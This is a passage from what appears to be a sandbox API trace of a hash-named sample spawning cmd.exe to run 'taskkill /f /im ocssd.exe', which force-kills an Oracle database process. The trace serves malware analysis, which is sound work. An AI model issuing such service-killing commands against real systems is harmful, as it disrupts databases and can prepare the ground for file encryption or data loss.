(HeapHandle=0x5f0000, Flags=0x8, Size=0xa1a) returned 0x5f87d8 [0155.042] FreeEnvironmentStringsA (penv="A") returned 1 [0155.042] GetProcessHeap () returned 0x5f0000 [0155.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4) returned 0x5f4038 [0155.042] GetEnvironmentStringsW () returned 0x5f7db0* [0155.042] GetProcessHeap () returned 0x5f0000 [0155.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa1a) returned 0x5f9200 [0155.042] FreeEnvironmentStringsA (penv="A") returned 1 [0155.042] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0155.042] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0155.042] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.042] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0155.042] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.042] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0155.043] RegCloseKey (hKey=0x88) returned 0x0 [0155.043] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0155.043] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0155.043] RegCloseKey (hKey=0x88) returned 0x0 [0155.044] time (in: timer=0x0 | out: timer=0x0) returned 0x62344209 [0155.044] srand (_Seed=0x62344209) [0155.044] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im ocssd.exe \"" [0155.044] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im ocssd.exe \"" [0155.044] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0155.044] GetProcessHeap () returned 0x5f0000 [0155.044] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x5f9c28 [0155.044] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5f9c30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0155.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0155.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0155.044] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0155.044] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0155.045] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0155.045] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0155.045] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0155.045] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0155.045] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0155.045] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0155.045] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0155.045] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0155.045] GetProcessHeap () returned 0x5f0000 [0155.046] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f87d8) returned 1 [0155.046] GetEnvironmentStringsW () returned 0x5f7db0* [0155.046] GetProcessHeap () returned 0x5f0000 [0155.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa32) returned 0x5fa880 [0155.047] FreeEnvironmentStringsA (penv="A") returned 1 [0155.047] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0155.047] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0155.047] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0155.047] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0155.047] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0155.047] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0155.047] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0155.047] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0155.047] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0155.047] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0155.047] GetProcessHeap () returned 0x5f0000 [0155.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x44) returned 0x5f4060 [0155.047] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0155.048] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0155.048] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0155.048] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5f40b0 [0155.048] FindClose (in: hFindFile=0x5f40b0 | out: hFindFile=0x5f40b0) returned 1 [0155.048] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5f40b0 [0155.049] FindClose (in: hFindFile=0x5f40b0 | out: hFindFile=0x5f40b0) returned 1 [0155.049] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0155.049] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5f40b0 [0155.049] FindClose (in: hFindFile=0x5f40b0 | out: hFindFile=0x5f40b0) returned 1 [0155.049] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0155.049] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0155.049] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0155.049] GetProcessHeap () returned 0x5f0000 [0155.050] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fa880) returned 1 [0155.050] GetEnvironmentStringsW () returned 0x5f7db0* [0155.050] GetProcessHeap () returned 0x5f0000 [0155.050] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa76) returned 0x5f9e40 [0155.050] FreeEnvironmentStringsA (penv="=") returned 1 [0155.050] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0155.050] GetProcessHeap () returned 0x5f0000 [0155.050] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f4060) returned 1 [0155.050] GetProcessHeap () returned 0x5f0000 [0155.050] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400e) returned 0x5fbd40 [0155.051] GetProcessHeap () returned 0x5f0000 [0155.051] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x46) returned 0x5f4060 [0155.051] GetProcessHeap () returned 0x5f0000 [0155.051] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x5ffd58 [0155.052] GetProcessHeap () returned 0x5f0000 [0155.052] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x603d68 [0155.218] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0155.219] GetProcessHeap () returned 0x5f0000 [0155.219] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x418) returned 0x5fa8c0 [0155.219] SetErrorMode (uMode=0x0) returned 0x8003 [0155.219] SetErrorMode (uMode=0x1) returned 0x0 [0155.219] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x5fa8c8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0155.220] SetErrorMode (uMode=0x8003) returned 0x1 [0155.220] GetProcessHeap () returned 0x5f0000 [0155.220] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fa8c0, Size=0x78) returned 0x5fa8c0 [0155.220] GetProcessHeap () returned 0x5f0000 [0155.220] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fa8c0) returned 0x78 [0155.220] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0155.220] GetProcessHeap () returned 0x5f0000 [0155.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x62) returned 0x5f40b0 [0155.220] GetProcessHeap () returned 0x5f0000 [0155.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb8) returned 0x5fa940 [0155.220] GetProcessHeap () returned 0x5f0000 [0155.220] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fa940, Size=0x62) returned 0x5fa940 [0155.220] GetProcessHeap () returned 0x5f0000 [0155.220] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fa940) returned 0x62 [0155.221] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0155.221] GetProcessHeap () returned 0x5f0000 [0155.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe0) returned 0x5fa9b0 [0155.225] GetProcessHeap () returned 0x5f0000 [0155.225] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fa9b0, Size=0x76) returned 0x5fa9b0 [0155.225] GetProcessHeap () returned 0x5f0000 [0155.225] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fa9b0) returned 0x76 [0155.225] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.226] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im ocssd.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0155.226] GetLastError () returned 0x3 [0155.226] GetProcessHeap () returned 0x5f0000 [0155.227] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5ffd58) returned 1 [0155.227] GetProcessHeap () returned 0x5f0000 [0155.227] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x603d68) returned 1 [0155.227] GetProcessHeap () returned 0x5f0000 [0155.228] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbd40) returned 1 [0155.228] GetConsoleOutputCP () returned 0x1b5 [0155.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0155.232] GetUserDefaultLCID () returned 0x409 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0155.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0155.233] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0155.236] GetProcessHeap () returned 0x5f0000 [0155.236] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20c) returned 0x5faa30 [0155.236] GetConsoleTitleW (in: lpConsoleTitle=0x5faa30, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0155.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0155.238] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0155.238] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0155.239] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0155.239] GetProcessHeap () returned 0x5f0000 [0155.239] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x5fbd40 [0155.239] GetProcessHeap () returned 0x5f0000 [0155.240] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbd40) returned 1 [0155.241] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0155.241] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0155.241] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0155.241] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0155.241] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0155.241] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0155.241] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0155.241] GetProcessHeap () returned 0x5f0000 [0155.241] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x5fac48 [0155.241] GetProcessHeap () returned 0x5f0000 [0155.241] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1a) returned 0x5f4168 [0155.241] GetProcessHeap () returned 0x5f0000 [0155.242] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2e) returned 0x5faca8 [0155.242] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0155.244] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0155.244] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0155.244] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0155.244] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0155.244] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0155.244] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0155.245] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0155.245] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0155.245] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0155.245] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0155.245] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0155.245] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0155.245] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0155.245] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0155.245] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0155.245] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0155.245] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0155.245] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0155.245] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0155.245] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0155.245] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0155.245] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0155.245] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0155.245] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0155.245] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0155.245] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0155.245] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0155.245] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0155.245] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0155.245] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0155.246] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0155.246] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0155.246] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0155.246] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0155.246] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0155.246] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0155.246] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0155.246] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0155.246] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0155.246] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0155.246] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0155.246] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0155.246] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0155.246] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0155.246] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0155.246] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0155.246] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0155.246] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0155.246] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0155.246] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0155.246] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0155.246] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0155.246] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0155.246] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0155.246] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0155.246] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0155.246] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0155.246] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0155.246] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0155.247] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0155.247] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0155.247] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0155.247] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0155.247] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0155.247] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0155.247] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0155.247] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0155.247] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0155.247] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0155.247] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0155.247] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0155.247] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0155.247] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0155.247] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0155.247] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0155.247] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0155.247] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0155.247] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0155.247] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0155.247] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0155.248] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0155.248] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0155.248] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0155.248] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0155.248] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0155.248] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0155.248] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0155.248] GetProcessHeap () returned 0x5f0000 [0155.248] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x5face0 [0155.248] GetProcessHeap () returned 0x5f0000 [0155.248] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x40) returned 0x5faef8 [0155.248] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0155.249] GetProcessHeap () returned 0x5f0000 [0155.249] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x418) returned 0x5f05c8 [0155.249] SetErrorMode (uMode=0x0) returned 0x8003 [0155.249] SetErrorMode (uMode=0x1) returned 0x0 [0155.249] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5f05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0155.249] SetErrorMode (uMode=0x8003) returned 0x1 [0155.249] GetProcessHeap () returned 0x5f0000 [0155.249] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f05c8, Size=0x56) returned 0x5f05c8 [0155.249] GetProcessHeap () returned 0x5f0000 [0155.249] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5f05c8) returned 0x56 